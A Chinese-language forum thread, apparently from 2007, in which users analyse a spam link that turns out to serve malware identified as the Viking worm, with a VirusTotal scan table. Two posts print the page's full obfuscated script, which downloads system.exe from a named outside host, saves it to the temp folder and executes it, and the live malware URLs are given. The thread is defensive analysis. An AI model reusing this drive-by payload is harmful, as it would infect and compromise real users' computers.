【討論】可以幫我測試一下以下網址是否有木馬嗎？

[天氣預報]

可以幫我測試一下以下網址是否有木馬嗎？

今天在MSN收到的

港台地區十大嘔吐女星排行榜: 第一位:楊丞琳 第二位.....詳細內容連接以下網址:
http://tinyurl.com/y3sfj2

有的話可以幫忙把有毒檔案位置公開和把生成物抓上來嗎？

[proll]

tp://mypaper.pchorne.com/news/00123/system.exe
初步檢測是Viking。

另外這個頁面的圖片比較噁心，還好我之前看過肢解嬰兒類似的網頁，要不真會吐出來

[DarkSkyline]

建議把http改成hxxp,以防止論壇網友隨意點選而中獎~

[esjustin]

<SCRIPT LANGUAGE="Javascript">
<!--
var Words="%3Ccenter%3E%3Cb%3E%3Cfont%20color%3Dred%20face%3D%22Verdana%22%20size%3D%222%22%3E%3C%2Ffont%3E%3C%2Fb%3E%0D%0A%3Chtml%3E%3Cscript%20language%3D%22VBScript%22%3E%20%20%20%20on%20error%20resume%20next%0D%0A%20%20%20%20Laoding%20%3D%22http%3A%2F%2Fmypaper%2Epchorne%2Ecom%2Fnews%2F00123%2Fsystem%2Eexe%22%0D%0A%20%20%20%20Set%20df%20%3D%20document%2EcreateElement%28%22ob%22%26Tr4c3%26%22jec%22%26Tr4c3%26%22t%22%29%0D%0A%20%20%20%20df%2EsetAttribute%20%22cl%22%26Tr4c3%26%22ass%22%26Tr4c3%26%22id%22%2C%22clsid%3ABD%22%26Tr4c3%26%2296C%22%26Tr4c3%26%22556%2D65A%22%26Tr4c3%26%223%2D11%22%26Tr4c3%26%22D0%2D983A%2D00C04FC%22%26Tr4c3%26%2229E36%22%0D%0A%20%20%20%20str%3D%22Micros%22%26Tr4c3%26%22oft%2EXM%22%26Tr4c3%26%22LH%22%26Tr4c3%26%22TTP%22%0D%0A%20%20%20%20Set%20x%20%3D%20df%2ECreateObject%28str%2C%22%22%29%0D%0A%20%20%20%20set%20S%20%3D%20df%2Ecreateobject%28%22Ado%22%26Tr4c3%26%22db%2ES%22%26Tr4c3%26%22tre%22%26Tr4c3%26%22am%22%2C%22%22%29%0D%0A%20%20%20%20S%2Etype%20%3D%201%0D%0A%20%20%20%20str6%3D%22GET%22%0D%0A%20%20%20%20x%2EOpen%20str6%2C%20Laoding%2C%20False%0D%0A%20%20%20%20x%2ESend%0D%0A%20%20%20%20fname1%3D%22Ding%2Ecom%22%0D%0A%20%20%20%20set%20F%20%3D%20df%2Ecreateobject%28%22Scr%22%26Tr4c3%26%22ipti%22%26Tr4c3%26%22ng%2EFileSy%22%26Tr4c3%26%22stemObj%22%26Tr4c3%26%22ect%22%2C%22%22%29%0D%0A%20%20%20%20set%20tmp%20%3D%20F%2EGetSpecialFolder%282%29%20%0D%0A%20%20%20%20S%2Eopen%0D%0A%20%20fname1%3D%20F%2EBuildPath%28tmp%2Cfname1%29%0D%0A%20%20%20%20S%2Ewrite%20x%2EresponseBody%0D%0A%20%20%20%20S%2Esavetofile%20fname1%2C2%0D%0A%20%20%20%20S%2Eclose%0D%0A%20%20%20%20set%20Q%20%3D%20df%2Ecreateobject%28%22Sh%22%26Tr4c3%26%22ell%2EApp%22%26Tr4c3%26%22lica%22%26Tr4c3%26%22tion%22%2C%22%22%29%0D%0A%20%20%20%20Q%2EShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%3C%2Fscript%3E%3C%2Fhtml%3E%0D%0A"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>

是這段語法作怪吧 .

[esjustin]

AntiVir可以偵測該威脅 .

[hn1271n]

請問已經打上安全補丁還會中獎嗎

[esjustin]

請問已經打上安全補丁還會中獎嗎

只要打對就不會中了 .

[baba_yu]

<SCRIPT LANGUAGE="Javascript">
<!--
var Words="%3Ccenter%3E%3Cb%3E%3Cfont%20color%3Dred%20face%3D%22Verdana%22%20size%3D%222%22%3E%3C%2Ffont%3E%3C%2Fb%3E%0D%0A%3Chtml%3E%3Cscript%20language%3D%22VBScript%22%3E%20%20%20%20on%20error%20resume%20next%0D%0A%20%20%20%20Laoding%20%3D%22http%3A%2F%2Fmypaper%2Epchorne%2Ecom%2Fnews%2F00123%2Fsystem%2Eexe%22%0D%0A%20%20%20%20Set%20df%20%3D%20document%2EcreateElement%28%22ob%22%26Tr4c3%26%22jec%22%26Tr4c3%26%22t%22%29%0D%0A%20%20%20%20df%2EsetAttribute%20%22cl%22%26Tr4c3%26%22ass%22%26Tr4c3%26%22id%22%2C%22clsid%3ABD%22%26Tr4c3%26%2296C%22%26Tr4c3%26%22556%2D65A%22%26Tr4c3%26%223%2D11%22%26Tr4c3%26%22D0%2D983A%2D00C04FC%22%26Tr4c3%26%2229E36%22%0D%0A%20%20%20%20str%3D%22Micros%22%26Tr4c3%26%22oft%2EXM%22%26Tr4c3%26%22LH%22%26Tr4c3%26%22TTP%22%0D%0A%20%20%20%20Set%20x%20%3D%20df%2ECreateObject%28str%2C%22%22%29%0D%0A%20%20%20%20set%20S%20%3D%20df%2Ecreateobject%28%22Ado%22%26Tr4c3%26%22db%2ES%22%26Tr4c3%26%22tre%22%26Tr4c3%26%22am%22%2C%22%22%29%0D%0A%20%20%20%20S%2Etype%20%3D%201%0D%0A%20%20%20%20str6%3D%22GET%22%0D%0A%20%20%20%20x%2EOpen%20str6%2C%20Laoding%2C%20False%0D%0A%20%20%20%20x%2ESend%0D%0A%20%20%20%20fname1%3D%22Ding%2Ecom%22%0D%0A%20%20%20%20set%20F%20%3D%20df%2Ecreateobject%28%22Scr%22%26Tr4c3%26%22ipti%22%26Tr4c3%26%22ng%2EFileSy%22%26Tr4c3%26%22stemObj%22%26Tr4c3%26%22ect%22%2C%22%22%29%0D%0A%20%20%20%20set%20tmp%20%3D%20F%2EGetSpecialFolder%282%29%20%0D%0A%20%20%20%20S%2Eopen%0D%0A%20%20fname1%3D%20F%2EBuildPath%28tmp%2Cfname1%29%0D%0A%20%20%20%20S%2Ewrite%20x%2EresponseBody%0D%0A%20%20%20%20S%2Esavetofile%20fname1%2C2%0D%0A%20%20%20%20S%2Eclose%0D%0A%20%20%20%20set%20Q%20%3D%20df%2Ecreateobject%28%22Sh%22%26Tr4c3%26%22ell%2EApp%22%26Tr4c3%26%22lica%22%26Tr4c3%26%22tion%22%2C%22%22%29%0D%0A%20%20%20%20Q%2EShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%3C%2Fscript%3E%3C%2Fhtml%3E%0D%0A"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>

是這段語法作怪吧 .

似乎是死連了
http://mypaper.pchorne.com/news/00123/system.exe

[LeeFred]

樓上的那個SYSTEM.EXE是病毒嗎?

??

[BitDefender]

Complete scanning result of "system.zip", received in VirusTotal at 02.15.2007, 06:34:15 (CET).VirusTotal 的報告
--------------------------------------------------------------------
Antivirus Version Update Result
AntiVir 7.3.1.37 02.14.2007 TR/Crypt.NSPM.Gen
Authentium 4.93.8 02.15.2007 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 02.14.2007 Win32:Tibs-ADO
AVG 386 02.14.2007 no virus found
BitDefender 7.2 02.15.2007 Win32.Worm.Viking.KK
CAT-QuickHeal 9.00 02.15.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.15.2007 no virus found
DrWeb 4.33 02.14.2007 Win32.HLLW.Gavir.59
eSafe 7.0.14.0 02.14.2007 suspicious Trojan/Worm
eTrust-Vet 30.4.3400 02.15.2007 Win32/NSAnti
Ewido 4.0 02.14.2007 Worm.Viking.hd
Fortinet 2.85.0.0 02.15.2007 W32/LOOKED_ST.O
F-Prot 4.2.1.29 02.15.2007 W32/PWStealer.gen1
F-Secure 6.70.13030.0 02.14.2007 Worm.Win32.Viking.hd
Ikarus T3.1.0.31 02.14.2007 Trojan-PWS.Win32.OnLineGames.id
Kaspersky 4.0.2.24 02.15.2007 Worm.Win32.Viking.hd
McAfee 4963 02.14.2007 no virus found
Microsoft 1.2204 02.15.2007 no virus found
NOD32v2 2062 02.15.2007 no virus found
Norman 5.80.02 02.14.2007 no virus found
Panda 9.0.0.4 02.14.2007 W32/Viking.HX.drp
Prevx1 V2 02.15.2007 no virus found
Sophos 4.14.0 02.13.2007 no virus found
Sunbelt 2.2.907.0 02.15.2007 no virus found
Symantec 10 02.15.2007 W32.Looked.BK
TheHacker 6.1.6.057 02.14.2007 no virus found
UNA 1.83 02.14.2007 no virus found
VBA32 3.11.2 02.14.2007 MalwareScope.Backdoor.Hupigon.2
VirusBuster 4.3.19:9 02.14.2007 no virus found